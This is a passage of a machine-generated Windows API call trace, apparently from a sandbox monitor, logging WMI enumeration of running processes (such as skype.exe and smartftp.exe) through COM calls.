[5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.249] IUnknown:Release (This=0x552c830) returned 0x2 [0265.249] IUnknown:QueryInterface (in: This=0x552c830, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552c830) returned 0x0 [0265.249] IUnknown:AddRef (This=0x552c830) returned 0x4 [0265.249] IUnknown:Release (This=0x552c830) returned 0x3 [0265.249] IUnknown:Release (This=0x552c830) returned 0x2 [0265.249] CoTaskMemFree (pv=0x54ba2e8) [0265.249] IUnknown:AddRef (This=0x552c830) returned 0x3 [0265.249] IWbemClassObject:Get (in: This=0x552c830, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.249] IWbemClassObject:Get (in: This=0x552c830, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"848\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.250] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"848\"") returned 0x5c [0265.250] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"848\"") returned 0x5c [0265.250] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.250] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.250] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.250] IUnknown:Release (This=0x601a94) returned 0x1 [0265.251] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0265.251] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.251] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a548) returned 0x0 [0265.251] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0265.251] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a548, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a548) returned 0x0 [0265.251] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a548, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a548, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.252] WbemDefPath:IUnknown:AddRef (This=0x552a548) returned 0x3 [0265.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a548, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a548, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a548, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5529288) returned 0x0 [0265.252] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5529288, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.252] WbemDefPath:IUnknown:Release (This=0x5529288) returned 0x3 [0265.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a548, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.252] WbemDefPath:IUnknown:Release (This=0x552a548) returned 0x2 [0265.252] WbemDefPath:IUnknown:Release (This=0x552a548) returned 0x1 [0265.252] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a548, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a548) returned 0x0 [0265.253] WbemDefPath:IUnknown:AddRef (This=0x552a548) returned 0x3 [0265.253] WbemDefPath:IUnknown:Release (This=0x552a548) returned 0x2 [0265.253] WbemDefPath:IWbemPath:SetText (This=0x552a548, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"848\"") returned 0x0 [0265.253] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.253] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.253] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.253] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.253] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.253] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.253] IWbemClassObject:Get (in: This=0x552c830, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ddfbc*=0, plFlavor=0x23ddfc0*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="skype.exe", varVal2=0x0), pType=0x23ddfbc*=8, plFlavor=0x23ddfc0*=0) returned 0x0 [0265.253] SysStringByteLen (bstr="skype.exe") returned 0x12 [0265.253] SysStringByteLen (bstr="skype.exe") returned 0x12 [0265.253] IWbemClassObject:Get (in: This=0x552c830, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ddfbc*=8, plFlavor=0x23ddfc0*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="skype.exe", varVal2=0x0), pType=0x23ddfbc*=8, plFlavor=0x23ddfc0*=0) returned 0x0 [0265.254] SysStringByteLen (bstr="skype.exe") returned 0x12 [0265.254] SysStringByteLen (bstr="skype.exe") returned 0x12 [0265.254] CoTaskMemAlloc (cb=0x4) returned 0x54ba1d8 [0265.254] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba1d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba1d8*=0x552b510, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.256] IUnknown:QueryInterface (in: This=0x552b510, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552b510) returned 0x0 [0265.256] IUnknown:QueryInterface (in: This=0x552b510, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.256] IUnknown:QueryInterface (in: This=0x552b510, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.256] IUnknown:QueryInterface (in: This=0x552b510, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.256] IUnknown:AddRef (This=0x552b510) returned 0x3 [0265.257] IUnknown:QueryInterface (in: This=0x552b510, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.257] IUnknown:QueryInterface (in: This=0x552b510, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.257] IUnknown:QueryInterface (in: This=0x552b510, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552b514) returned 0x0 [0265.257] IMarshal:GetUnmarshalClass (in: This=0x552b514, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.257] IUnknown:Release (This=0x552b514) returned 0x3 [0265.257] IUnknown:QueryInterface (in: This=0x552b510, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.257] IUnknown:Release (This=0x552b510) returned 0x2 [0265.257] IUnknown:QueryInterface (in: This=0x552b510, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552b510) returned 0x0 [0265.257] IUnknown:AddRef (This=0x552b510) returned 0x4 [0265.257] IUnknown:Release (This=0x552b510) returned 0x3 [0265.257] IUnknown:Release (This=0x552b510) returned 0x2 [0265.257] CoTaskMemFree (pv=0x54ba1d8) [0265.257] IUnknown:AddRef (This=0x552b510) returned 0x3 [0265.258] IWbemClassObject:Get (in: This=0x552b510, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.258] IWbemClassObject:Get (in: This=0x552b510, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3860\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.258] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3860\"") returned 0x5e [0265.258] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3860\"") returned 0x5e [0265.258] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.258] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.258] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.258] IUnknown:Release (This=0x601a94) returned 0x1 [0265.259] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0265.259] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.259] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a5b8) returned 0x0 [0265.259] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0265.259] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a5b8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a5b8) returned 0x0 [0265.260] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a5b8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.260] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a5b8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.260] WbemDefPath:IUnknown:AddRef (This=0x552a5b8) returned 0x3 [0265.260] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a5b8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.260] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a5b8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.260] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a5b8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x55291c8) returned 0x0 [0265.260] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55291c8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.260] WbemDefPath:IUnknown:Release (This=0x55291c8) returned 0x3 [0265.260] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a5b8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.260] WbemDefPath:IUnknown:Release (This=0x552a5b8) returned 0x2 [0265.261] WbemDefPath:IUnknown:Release (This=0x552a5b8) returned 0x1 [0265.261] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a5b8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a5b8) returned 0x0 [0265.261] WbemDefPath:IUnknown:AddRef (This=0x552a5b8) returned 0x3 [0265.261] WbemDefPath:IUnknown:Release (This=0x552a5b8) returned 0x2 [0265.261] WbemDefPath:IWbemPath:SetText (This=0x552a5b8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3860\"") returned 0x0 [0265.262] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.262] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.262] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.262] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.262] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.262] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.262] IWbemClassObject:Get (in: This=0x552b510, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23de840*=0, plFlavor=0x23de844*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="smartftp.exe", varVal2=0x0), pType=0x23de840*=8, plFlavor=0x23de844*=0) returned 0x0 [0265.262] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0265.262] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0265.262] IWbemClassObject:Get (in: This=0x552b510, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23de840*=8, plFlavor=0x23de844*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="smartftp.exe", varVal2=0x0), pType=0x23de840*=8, plFlavor=0x23de844*=0) returned 0x0 [0265.262] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0265.262] SysStringByteLen (bstr="smartftp.exe") returned 0x18 [0265.263] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.263] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x552b840, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.264] IUnknown:QueryInterface (in: This=0x552b840, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552b840) returned 0x0 [0265.265] IUnknown:QueryInterface (in: This=0x552b840, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.265] IUnknown:QueryInterface (in: This=0x552b840, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.265] IUnknown:QueryInterface (in: This=0x552b840, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.265] IUnknown:AddRef (This=0x552b840) returned 0x3 [0265.265] IUnknown:QueryInterface (in: This=0x552b840, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.265] IUnknown:QueryInterface (in: This=0x552b840, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.265] IUnknown:QueryInterface (in: This=0x552b840, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552b844) returned 0x0 [0265.265] IMarshal:GetUnmarshalClass (in: This=0x552b844, 